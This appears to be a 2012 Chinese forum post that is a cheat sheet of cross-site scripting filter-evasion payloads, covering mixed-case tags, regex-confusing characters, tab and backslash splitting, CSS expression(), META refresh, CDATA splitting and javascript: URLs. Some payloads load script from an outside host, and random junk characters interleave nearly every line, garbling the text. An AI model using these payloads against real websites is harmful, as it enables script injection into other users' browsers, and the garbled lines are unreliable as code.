1. 改变字符大小写
$ i4 i$ T f3 h" _3 |: V; K+ k h/ x6 S0 J" _7 S
/ ]8 w1 {2 F7 m6 Z8 U4 e
2 ^6 c; z: t6 g! K9 s' z T <sCript>alert(‘d’)</scRipT>9 B2 b; W+ w$ G
# j1 k5 d) `; Q8 ^5 s2. 利用多加一些其它字符来规避Regular Expression的检查
) Y/ ^2 {0 p# d- `0 m- b x! w! _9 e! L7 Z" j$ e
<<script>alert(‘c’)//<</script>
5 C4 @; ]& B* l1 Q. b9 S
3 g+ X" O5 P9 U' A4 M: b <SCRIPT a=">" SRC="t.js"></SCRIPT>
1 p$ a6 x0 f* h7 j8 s3 _' I% t; ]' {$ H
<SCRIPT =">" SRC="t.js"></SCRIPT>
) u. Y8 c/ ^" J ^% O9 \# }
# G R- d9 g, Y5 J, R <SCRIPT a=">" ” SRC="t.js"></SCRIPT>4 i" i6 [; W) O* l, B
: F/ l& B5 D; B5 B0 ^- V% D
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>- h1 J1 b& w5 X# p6 ]3 v6 k6 G
2 l1 J8 I) D8 _. d
<SCRIPT a=`>` SRC="t.js"></SCRIPT>
6 H5 W6 _' ~$ t
: z# \3 o" C2 e+ K) ` <SCRIPT a=">’>" SRC="t.js"></SCRIPT>. I7 V; @5 o$ o; ?' ~4 a7 W
% G, {# Y; d+ g; Z* F) d
3. 以其它扩展名取代.js
& O% E& O1 |, r2 w# `- H$ s
" H# c$ Z" B' E8 c. f <script src="bad.jpg"></script>
' ?" H+ q1 M3 `: z! d0 C T+ R. [5 ~5 G# \8 x+ R
4. 将Javascript写在CSS档里
4 V6 a" @% X- T6 Q, G3 w# z( f: o/ n0 R, T3 w, R; M
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">) U- Q( J+ c2 W
1 g. \2 t' o' a l+ D example:# g& h: N! M. S$ ^# X8 @6 L' S
! I* Z6 {$ @0 Y+ R
body {
+ [* f, Z4 Q) k, }+ k. |
; a k% P" |5 Z( v4 h: s2 E background-image: url(‘javascript:alert("XSS");’), m1 k; }/ z0 M2 g+ |5 `' g& S2 q6 y
8 I) g" G/ s+ b8 g; ?7 Q }# k# s2 E; t5 g/ _
. M0 A$ ^4 v2 o1 F0 M& Z) F1 C5. 在script的tag里加入一些其它字符/ ]: B0 @& ~' {
" H3 ?4 A* g4 d v+ l3 L k: L; V
<SCRIPT/SRC="t.js"></SCRIPT>
9 i8 u6 e! F4 y: ~8 m8 v- }
w7 g1 @) s7 y <SCRIPT/anyword SRC="t.js"></SCRIPT>
( C0 y& }! T/ i5 Y+ M' K7 R! P+ X& O( I% y6 X1 s: c
6. 使用tab或是new line来规避
k1 C( }6 I/ f0 c
# u& Z/ l4 ~7 m0 d- h' h3 | <img src="jav ascr ipt:alert(‘XSS3′)">
6 t d1 l5 `6 I8 e: e7 w. e$ l2 U' E" x; H6 n
<img src="jav ascr ipt:alert(‘XSS3′)">3 K! N( Y8 T' G# t3 |9 B6 O! S
8 i2 D e( c1 Y5 l$ C
<IMG SRC="jav ascript:alert(‘XSS’);">
E" N t+ L, o
# C0 d% t, a7 H* U4 @2 k, E* I0 ` -> tag/ m6 P, l. {* n& _2 g K- `; g
1 V4 ^2 f% H+ f4 G0 W -> new line
& D2 X- d0 j, U
7 D. b* r5 S2 k" I5 z- W. r7. 使用"\"来规避
' f8 g$ l/ L# r8 y& I/ Q3 t- f9 L" S2 ]5 A+ h
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>" `2 I& J0 L: s: V
# ^) t U: s" G; m <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>0 H) X0 ]" X# e& @, ^( ]
! G! ^- \/ M2 k* E) \
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
# l- U0 g$ A7 h# R7 l) i" r* s1 V0 p1 w' b1 H
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
: F! ?# A9 C: `6 x' D. L/ Q9 f8 n* H9 V
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>+ x! O4 d! u" | [8 ^! ~8 R
( ^# q, U" }, R% d
8. 使用Hex encode来规避(也可能会把";"拿掉)% e8 S! j7 {/ {5 r; ~
$ y5 \9 b* g; k' A <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
% v) ~+ W2 }, Z& x. `# C5 v
$ T; A$ \2 E+ `! A/ H1 U 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
# V& A6 Z$ x7 h! n# l' p, S' N
0 O5 B* v0 z# E3 g \3 v/ A. n <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">3 p( c& m" M0 ]& b: K: Y" R
, O2 K- [' V: B: I, Q/ K 原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">& t; O8 X! n- n+ P- a
# e8 F6 d5 n$ `0 x4 R9. script in HTML tag
! C Y. y# W7 B* G6 g) ^0 o# }6 e8 R* _) N1 t) k t
<body onload=」alert(‘onload’)」>
$ q' [/ q9 p, f- X+ J# D# T: d7 |! x7 A0 A6 _& d- H* Z0 s1 x+ t; m# R
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload% ? z# N3 K1 j
1 I) x2 _, R5 O2 @+ L0 J
10. 在swf里含有xss的code
' X" h5 [ B6 ?3 b1 l( Q7 i9 B1 y# T1 R3 Q- a' i
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>4 o7 u! N6 m T6 e. ^
2 g% c/ ?8 g! n11. 利用CDATA将xss的code拆开,再组合起来。 |# M& J$ |2 ?5 o& Z0 q+ G: ?
3 `9 x, Q2 A( O. W! {0 r% C# j <XML ID=I><X><C>
, l+ y0 b w% R% b
5 r& p5 p0 a( z! S0 o <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>/ ]; R9 x! a( z5 S
0 P* \, v4 g1 a5 ] </C></X>
' ~! F1 [4 G8 b) L' z6 D
$ B# f) r0 W7 \ </xml>: u9 B% s; K6 S f( I$ W
$ Q0 c$ _5 b8 v' P+ A7 m
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>$ g$ }9 G; w7 a+ a* `! x
+ a+ B- L/ N. K/ Q8 j4 n
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
3 F) k# b6 R7 \
. S8 g" m, a& M0 y6 d1 v <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>8 d2 ^, ]' T _# S& A
1 G7 W- e- p+ h' ?$ {9 |12. 利用HTML+TIME。
/ M5 y- ^& |/ ?0 L6 Y( b) n
& s! e1 _4 |9 S* _; s <HTML><BODY> V S8 I- `* T+ i7 E4 ]9 [# z
. {3 d+ ?5 r e0 E, z <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">+ P! W, N( ~- ^8 j5 Q- }2 y
. H' M+ C X! @# D" I- D
<?import namespace="t" implementation="#default#time2">
% K2 I" V, B8 ^3 x' z: ]
+ N' ]7 x" a, | <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">, I% W5 V# A7 S5 F4 p, |, _1 d
8 e& D, u9 z/ W5 W! H, `& q1 F' R </BODY></HTML>* o Q0 d. D; J5 I+ p
8 `. e; I/ Q+ d6 I$ ^
13. 透过META写入Cookie。
' r$ u4 z9 t: S) b; P* ~& H
8 ?4 q! B( _* w, q <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">3 D+ R6 C, K. S7 o) l1 V
# [2 i# Z0 C" ?7 G" p5 O14. javascript in src , href , url* F% _; {' F; a0 }! }
; O& c6 i7 z+ v1 s( U
<IFRAME SRC=javascript:alert(’13′)></IFRAME>
! B6 A& T: }$ O" b# J
5 G- r' h/ i1 H( g8 z! c4 U4 w <img src="javascript:alert(‘XSS3′)">
4 h' r( ^; \9 C/ Q( H, h9 _+ {+ L G7 p# P: d2 y c2 X
<IMG DYNSRC="javascript:alert(‘XSS20′)">9 V$ L W8 u5 {) T( p2 v( U
" F/ J& V1 z5 C& ]9 E& U <IMG LOWSRC="javascript:alert(‘XSS21′)">
( R. i' ^& r% _
8 A& K' m' F" ~- @ <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
; O6 W3 m) D/ z% Q! e% [. c( }9 b( W4 R$ M) V
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>: c! x1 P1 [" J o- C
+ Y# |0 T, T q" C# v1 U! u$ o, q$ t* Y <TABLE BACKGROUND="javascript:alert(‘XSS29′)">5 A! o; j( S$ m: i. n. s( O+ z9 {
+ S$ {9 w1 h! B! _5 P2 W9 O! H
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">6 G5 [" ^. C( s2 l% ~8 D
, \- n! \, F5 ?! y2 D+ O7 G8 ? <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
! ~/ `& s! ]: c: z' _# z; T
, D9 l! D/ V# a1 r0 p( O( n </STYLE><A CLASS=XSS></A>
~7 h6 ^9 }9 \
# K: ]% ~+ x$ ]3 S/ `' c <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>! A: P2 f0 X3 K! |0 x- n- ?7 B
" O2 J5 [& s% y& F1 K* c |
发表于 2012-12-31 09:59:28
收藏
支持
反对